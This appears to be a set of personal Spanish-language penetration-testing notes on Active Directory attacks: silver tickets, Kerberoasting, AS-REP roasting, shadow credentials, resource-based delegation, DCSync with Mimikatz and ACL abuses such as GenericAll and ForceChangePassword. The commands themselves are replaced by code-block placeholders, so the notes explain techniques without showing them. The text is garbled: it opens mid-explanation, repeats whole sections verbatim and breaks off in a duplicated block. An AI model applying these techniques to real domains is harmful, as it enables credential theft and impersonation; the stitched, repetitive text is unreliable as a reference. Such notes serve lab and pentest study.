Ese TGS se cifra con la clave de la cuenta de servicio asociada al SPN (es decir, el NT hash de la cuenta bajo la que corre MSSQL o la cuenta mapeada al SPN).
-
Por tanto, el receptor lógico del ticket —el servicio que tiene la clave— puede descifrarlo y verificar su integridad.
-
-
Quién valida el ticket al llegar
-
El servidor de aplicación (o su proceso de autenticación —ej. LSASS en Windows/SQL Server) recibe el ticket y lo descifra con la clave del service account.
-
Si el descifrado es correcto y las comprobaciones locales que haga el servicio pasan, el servicio te “acepta” como la identidad que figura en el ticket.
-
No hace falta que el KDC (
krbtgt) haya emitido ese ticket porque el servicio sólo necesita poder descifrar/verificarlo con su propia clave.
-
-
Entonces… ¿qué papel tiene
krbtgtnormalmente?-
En un flujo Kerberos legítimo, el KDC (mediante la clave
krbtgt) firma/autoriza el PAC y emite tickets. Esa firma permite a servicios confiar en las memberships/atributos dentro del PAC. -
Al forjar un silver ticket se salta la emisión por el KDC; por eso la firma del KDC sobre el PAC no estará presente o no será válida. Algunos servicios comprueban esa firma; otros no.
-
-
Por qué algunos servicios aceptan el ticket aun sin krbtgt
-
Muchos servicios / configuraciones sólo requieren que el ticket se descifre correctamente con la clave del SPN y no validan la firma del PAC contra el KDC. En esos casos aceptan los SIDs/memberships que trae el ticket.
-
Otros servicios (o configuraciones más estrictas) sí verifican la validez del PAC o consultan al DC para confirmar atributos; en esos casos el silver ticket puede fallar o comportarse de forma limitada.
-
-
Resumen en una línea
- No te estás “autenticando contra
krbtgtporque no necesitas que el KDC te entregue el ticket: te estás autenticando contra el servicio objetivo (la cuenta/SPN) que posee la clave usada para cifrar y descifrar ese ticket.**
- No te estás “autenticando contra
Default Domain Policy - Generic Write
SharpGPOAbuse/SharpGPOAbuse-master at main · byronkg/SharpGPOAbuse · GitHub
{{CODE_BLOCK_49}}
{{CODE_BLOCK_50}}
Unconstrained Delegation
Imagina un escenario común de 3 niveles:
- Usuario: Un empleado.
- Servicio Front-end: Un servidor web (Ej: IIS).
- Servicio Back-end: Un servidor de base de datos (Ej: SQL Server).
El usuario accede al servidor web. El servidor web necesita consultar la base de datos en nombre del usuario (para aplicar sus permisos).
Con la Delegación No Restringida, se marcaba la cuenta del servidor web como "Confiable para delegación" (Trusted for Delegation) en AD.
- El Riesgo 🚨: Si un atacante comprometía el servidor web (Front-end), obtenía un poder inmenso. Podía suplantar a cualquier usuario (incluido un Administrador de Dominio que hubiera iniciado sesión en el servidor web) y usar esa identidad para acceder a cualquier otro servicio en el dominio (controladores de dominio, servidores de archivos, etc.). Era un "cheque en blanco".
Constrained Delegation
Se especifica una lista blanca de servicios a los que puede acceder el Front-end (solo al servicio de bases de datos)
Kerberos Constrained Delegation (KCD) Tradicional
Se edita el atributo msDS-AllowedToDelegateTo del Front-end con una lista de SPNs a los que permite acceder
Resource-Based Constrained Delegation (RBCD)
Se editaría el atributo msDS-AllowedToActOnBehalfOfOtherIdentity en el backend esta vez. Esto lista las cuentas de servicio o máquinas que tienen permiso para delegar hacia el backend.
El dueño del backend decide que frontends pueden suplantar usuarios para acceder a su backend.
Sobre el ordenador sobre el que podemos modificar msDS-AllowedToActOnBehalfOfOtherIdentity
{{CODE_BLOCK_51}}
"Soy COMPUTER$, y quiero que me des un ticket de servicio como si yo fuera el usuario backupadmin":
{{CODE_BLOCK_52}}
#Assing delegation privileges
"Soy `COMPUTER$`, y quiero que me des un ticket de servicio como si yo fuera el usuario `backupadmin`":
{{CODE_BLOCK_52}}
--attr msDS-ManagedPassword
Para añadir un usuario a un grupo usando autenticación por kerberos
WriteOwner
Si tienes permiso WriteOwner, puedes cambiar el propietario del objeto sobre el que tienes WriteOwner a ti mismo, para así luego ponerle GenericAll por ejemplo.
{{CODE_BLOCK_14}}
{{CODE_BLOCK_15}}
DCsync
-
Simulación de replicación: Un atacante con los permisos adecuados en un controlador de dominio (usualmente, un Administrador de dominio o Administrador de Enterprise) puede usar herramientas como Mimikatz para simular el proceso de replicación de un controlador de dominio.
-
Extracción de contraseñas: Al realizar una replicación del dominio, el atacante puede solicitar contraseñas de cuentas, hashes de contraseñas y otros atributos de las cuentas de usuario (como las contraseñas almacenadas en el atributo
msDS-ReplicatorPasswords). -
Uso de herramientas: Mimikatz es una de las herramientas más utilizadas para ejecutar un ataque DCsync. Al emplear la funcionalidad de
lsadump::dcsyncen Mimikatz, el atacante puede recuperar las contraseñas de los usuarios de la base de datos de Active Directory, incluida la cuenta de Administrator o cuentas con privilegios elevados.
Generic All
-
Nos da control total sobre un usuario
-
Por tener GenericAll sobre un grupo no tenemos GenericAll sobre los integrantes
Para cambiar su contraseña:
Kerberoast (PRIMERA FORMA)
AS-REPRoast (SEGUNDA FORMA)
Podemos añadir al usuario P.AGILA SERVICE ACCOUNTS
{{CODE_BLOCK_19}}
ForceChangePassword
Crackear hash
Cambias pass
{{CODE_BLOCK_22}}
WriteSPN
{{CODE_BLOCK_23}}
Con kerberos:
{{CODE_BLOCK_24}}
{{CODE_BLOCK_25}}
GenericWrite
- Vamos a hacerle kerberoast:
O así
{{CODE_BLOCK_27}}
o así:
{{CODE_BLOCK_28}}
- Añadirnos a un grupo sobre el que tenemos Generic Write
{{CODE_BLOCK_30}}
- Credenciales en la sombra
Las credenciales en la sombra son una técnica de persistencia y escalada de privilegios en Active Directory que consiste en inyectar un certificado tuyo en una cuenta de AD (como winrm_svc), usando el atributo:
msDS-KeyCredentialLink
Una vez inyectado, puedes autenticarse como esa cuenta usando Kerberos/PKINIT, sin necesidad de su contraseña o hash.
{{CODE_BLOCK_31}}
Con kerberos:
{{CODE_BLOCK_32}}
AddMember
Da opción de añadir miembros a un grupo como de quitar miembros.
{{CODE_BLOCK_33}}
{{CODE_BLOCK_34}}
ReadGMSAPassword
ReadGMSAPassword es una función de Windows (más específicamente de Active Directory) que se refiere a la capacidad de leer la contraseña de una cuenta de servicio administrada de grupo, conocida como gMSA (Group Managed Service Account).
🔐 ¿Qué es una gMSA?
Una gMSA (Group Managed Service Account) es un tipo especial de cuenta en Active Directory que:
-
Es administrada automáticamente por el dominio (incluye rotación automática de contraseñas).
-
Está diseñada para servicios o aplicaciones que corren en múltiples servidores.
-
Su contraseña es conocida solo por el sistema, y normalmente no accesible para los humanos.
📥 ¿Qué hace ReadGMSAPassword?
La permisión ReadGMSAPassword determina qué equipos o usuarios tienen permitido leer (recuperar) la contraseña cifrada de una cuenta gMSA desde el Controlador de Dominio (DC).
Un equipo o servicio que tiene esta capacidad puede:
-
Solicitar la contraseña de la gMSA al DC.
-
Utilizar esa contraseña para autenticarse como la gMSA.
ReadLAPSPassword
{{CODE_BLOCK_36}}
DCSync
{{CODE_BLOCK_37}}
Kerberos
{{CODE_BLOCK_38}}
Buscar objetos borrados 🗑️
Y posteriormente restablecerlos, quizás sea necesario habilitarlos
Rebuscar en la papelera de reciclaje local 🗑️
{{CODE_BLOCK_40}}
{{CODE_BLOCK_41}}
Silver Ticket Attack 🎟️
If you compromise an account's password with a SPN you can use that password to create a Silver Ticket impersonating any user to that service.
Delegation vs Direct Access: Directly connecting to the MSSQL service using a password relies on the permissions assigned to the **svc_mssql** account within SQL Server. This includes permissions defined in roles, explicit grants, or denies, etc. The MSSQL service checks the account's permissions within the context of SQL Server.
Silver Ticket and Service Account: Crafting a silver ticket means you're effectively impersonating the **svc_mssql** service account at the Kerberos authentication level. In the context of MSSQL, this account might have been configured (often mistakenly) with higher or sysadmin privileges, especially if it's the account used to run the SQL Server service. This can often be the case
Procedimiento
- Para obtener el nthash en base a la contraseña:
- Para obtener el SPN:
{{CODE_BLOCK_43}}
- Para obtener el SID
/etc/krb5.conf
{{CODE_BLOCK_46}}
{{CODE_BLOCK_47}}
Por eiemplo
-
Qué hace un silver ticket
-
Cuando forjas un silver ticket estás creando un TGS (Ticket-Granting Service) para un SPN concreto (p. ej.
MSSQL/nagoya...). -
Ese TGS se cifra con la clave de la cuenta de servicio asociada al SPN (es decir, el NT hash de la cuenta bajo la que corre MSSQL o la cuenta mapeada al SPN).
-
Por tanto, el receptor lógico del ticket —el servicio que tiene la clave— puede descifrarlo y verificar su integridad.
-
-
Quién valida el ticket al llegar
-
El servidor de aplicación (o su proceso de autenticación —ej. LSASS en Windows/SQL Server) recibe el ticket y lo descifra con la clave del service account.
-
Si el descifrado es correcto y las comprobaciones locales que haga el servicio pasan, el servicio te “acepta” como la identidad que figura en el ticket.
-
No hace falta que el KDC (
krbtgt) haya emitido ese ticket porque el servicio sólo necesita poder descifrar/verificarlo con su propia clave.
-
-
Entonces… ¿qué papel tiene
krbtgtnormalmente?-
En un flujo Kerberos legítimo, el KDC (mediante la clave
krbtgt) firma/autoriza el PAC y emite tickets. Esa firma permite a servicios confiar en las memberships/atributos dentro del PAC. -
Al forjar un silver ticket se salta la emisión por el KDC; por eso la firma del KDC sobre el PAC no estará presente o no será válida. Algunos servicios comprueban esa firma; otros no.
-
-
Por qué algunos servicios aceptan el ticket aun sin krbtgt
-
Muchos servicios / configuraciones sólo requieren que el ticket se descifre correctamente con la clave del SPN y no validan la firma del PAC contra el KDC. En esos casos aceptan los SIDs/memberships que trae el ticket.
-
Otros servicios (o configuraciones más estrictas) sí verifican la validez del PAC o consultan al DC para confirmar atributos; en esos casos el silver ticket puede fallar o comportarse de forma limitada.
-
-
Resumen en una línea
- No te estás “autenticando contra
krbtgtporque no necesitas que el KDC te entregue el ticket: te estás autenticando contra el servicio objetivo (la cuenta/SPN) que posee la clave usada para cifrar y descifrar ese ticket.**
- No te estás “autenticando contra
Default Domain Policy - Generic Write
SharpGPOAbuse/SharpGPOAbuse-master at main · byronkg/SharpGPOAbuse · GitHub
{{CODE_BLOCK_49}}
{{CODE_BLOCK_50}}
Unconstrained Delegation
Imagina un escenario común de 3 niveles:
- Usuario: Un empleado.
- Servicio Front-end: Un servidor web (Ej: IIS).
- Servicio Back-end: Un servidor de base de datos (Ej: SQL Server).
El usuario accede al servidor web. El servidor web necesita consultar la base de datos en nombre del usuario (para aplicar sus permisos).
Con la Delegación No Restringida, se marcaba la cuenta del servidor web como "Confiable para delegación" (Trusted for Delegation) en AD.
- El Riesgo 🚨: Si un atacante comprometía el servidor web (Front-end), obtenía un poder inmenso. Podía suplantar a cualquier usuario (incluido un Administrador de Dominio que hubiera iniciado sesión en el servidor web) y usar esa identidad para acceder a cualquier otro servicio en el dominio (controladores de dominio, servidores de archivos, etc.). Era un "cheque en blanco".
Constrained Delegation
Se especifica una lista blanca de servicios a los que puede acceder el Front-end (solo al servicio de bases de datos)
Kerberos Constrained Delegation (KCD) Tradicional
Se edita el atributo msDS-AllowedToDelegateTo del Front-end con una lista de SPNs a los que permite acceder
Resource-Based Constrained Delegation (RBCD)
Se editaría el atributo msDS-AllowedToActOnBehalfOfOtherIdentity en el backend esta vez. Esto lista las cuentas de servicio o máquinas que tienen permiso para delegar hacia el backend.
El dueño del backend decide que frontends pueden suplantar usuarios para acceder a su backend.
Sobre el ordenador sobre el que podemos modificar msDS-AllowedToActOnBehalfOfOtherIdentity
{{CODE_BLOCK_51}}
"Soy COMPUTER$, y quiero que me des un ticket de servicio como si yo fuera el usuario backupadmin":
{{CODE_BLOCK_52}}